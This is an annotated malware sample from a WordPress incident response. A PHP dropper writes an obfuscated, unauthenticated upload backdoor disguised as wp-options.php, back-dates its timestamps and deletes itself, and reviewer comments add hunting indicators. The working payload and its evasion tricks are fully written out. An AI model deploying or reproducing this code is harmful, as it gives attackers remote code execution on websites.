1 | /* Found a suspicious dropper that writes an upload backdoor as wp-admin/wp-optionstmp.php, renames it to wp-options.php in the WordPress root (wp-options.php is not a WordPress core file; the name is chosen to look like one), back-dates the timestamps, then deletes itself. It was placed by an unknown earlier backdoor and sits dormant until frommshead.php (the file holding the script below) is requested directly; the resulting wp-options.php accepts unauthenticated file uploads, i.e. arbitrary PHP execution on the site. | |
2 | ||
3 | Possible backdoors may be cmdshell files, maldet found these files in production: | |
4 | wp-includes/js/thickbox/rvbt28.php | |
5 | wp-includes/class-wp-xmlrpc.php | |
6 | wp-content/themes/agentpress/mtgh.php | |
7 | ||
8 | The backdoors may have been placed through one or more vulnerable plugins. Two advisories matching components found in production, though it is not certain which exploit was actually used: | |
9 | http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html | |
10 | http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html | |
11 | ||
12 | A separate backdoor has placed eval(base64_decode(...)) in the footer.php of every theme under /themes/, with a comment claiming it is WP cache code. It may be unrelated to frommshead.php, but could have been dropped through one of the backdoors listed above. | |
13 | ||
14 | Still seeking possible backdoors that have evaded maldet. | |
15 | */ | |
16 | ||
<?php
// NOTE(review): this is a captured malware sample (dropper stage), annotated for incident
// responders. It contains no authentication or authorization check of any kind. Do not deploy.
//
// What this script does when requested directly, in order:
//   1. writes an unauthenticated file-upload backdoor next to itself as wp-optionstmp.php,
//   2. renames it to ../wp-options.php (the WordPress root when this runs from wp-admin/),
//   3. back-dates the new file, and itself, to 2013-12-31 12:17:11 — presumably so the files
//      blend in with old core files and evade mtime-based triage,
//   4. deletes itself (frommshead.php).

$DEBUG_MODE=false; // assigned but never read anywhere in this file

// Creating wp-admin/wp-options.php (uploader)

// Payload source, held as a PHP string. Every '#' is a placeholder for '$' and is swapped back
// at write time by the str_replace() below, so the literal tokens `$_POST` / `$_FILES` never
// appear in this dropper — a cheap way to dodge signature-based scanners. Behaviour of the
// payload once written (read it with '#' as '$'):
//   - POST with `Submit` set and an `image` file part: the upload is moved to
//     `$filedir . $_FILES['image']['name']`, with `$filedir = ''` (relative to the working
//     directory, normally the directory of wp-options.php). The destination name is the
//     client-supplied filename with no extension, MIME, size or path validation, so a .php
//     upload gives remote code execution. `$maxfile` is set but never enforced.
//   - `@` on move_uploaded_file() suppresses any warning, so failures are silent.
//   - any other request (e.g. GET) renders a bare upload form.
// Lines inside the string are runtime data and must be read verbatim — they are what lands on disk.
$file_data_head ="<?php
if(isset(#_POST['Submit'])){
#filedir = '';
#maxfile = '2888888';

#userfile_name = #_FILES['image']['name'];
#userfile_tmp = #_FILES['image']['tmp_name'];
if (isset(#_FILES['image']['name'])) {
#abod = #filedir.#userfile_name;
@move_uploaded_file(#userfile_tmp, #abod);

}
}
else{
echo'<form method=\"POST\" action=\"\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"image\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"></form>';
}
?>";

echo"<br>---------------------------- Create wp-admin/wp-options.php (uploader) ---------------------------------<br><br>";
// Step 1: de-obfuscate ('#' -> '$') and write the uploader beside this script, then back-date it.
// mktime(hour, minute, second, month, day, year) => 2013-12-31 12:17:11 server-local time.
// `$start` is never defined in this file, so the status lines print an empty prefix (and a PHP
// notice if notices are enabled) — a leftover from a larger toolkit, presumably.
if (file_put_contents("wp-optionstmp.php", str_replace("#", "$", $file_data_head))) {
    touch("wp-optionstmp.php", mktime(12, 17, 11, 12, 31, 2013));
    echo"Proceeded: ".$start."/wp-admin/wp-options.php > Succesfull<br>";
} else {
    echo"Proceeded: ".$start."/wp-admin/wp-options.php > Error!<br>";
}

$file = 'wp-optionstmp.php';
$newfile = '../wp-options.php';

echo"<br>---------------------------- Move wp-admin/wp-options.php > To root folder ---------------------------------<br><br>";
// Step 2: move the uploader one directory up (wp-admin/ -> site root) and back-date it again;
// rename() on the same filesystem preserves the inode, so this is the same file.
if (rename($file,$newfile)) {
    touch("../wp-options.php", mktime(12, 17, 11, 12, 31, 2013));
    echo"Proceeded: ".$start."/wp-options.php > Succesfull<br>";
} else {
    echo"Proceeded: ".$start."/wp-options.php > Error!<br>";
}

$file='frommshead.php';

echo"<br>---------------------------- Remove frommshead.php (Remove files) ---------------------------------<br><br>";
// Step 3: self-delete. The touch() right before unlink() only matters if the unlink fails
// (e.g. permissions), in which case the dropper is left behind with a back-dated mtime.
// Self-removal only works if this script really is saved as frommshead.php in the current directory.
//
// IR hunting notes grounded in the above: look for wp-options.php in the WordPress root and
// wp-optionstmp.php under wp-admin/; files whose mtime is exactly 2013-12-31 12:17:11; and
// access-log hits for frommshead.php, plus multipart POSTs to wp-options.php (each one is an upload).
touch("frommshead.php", mktime(12, 17, 11, 12, 31, 2013));
unlink($file);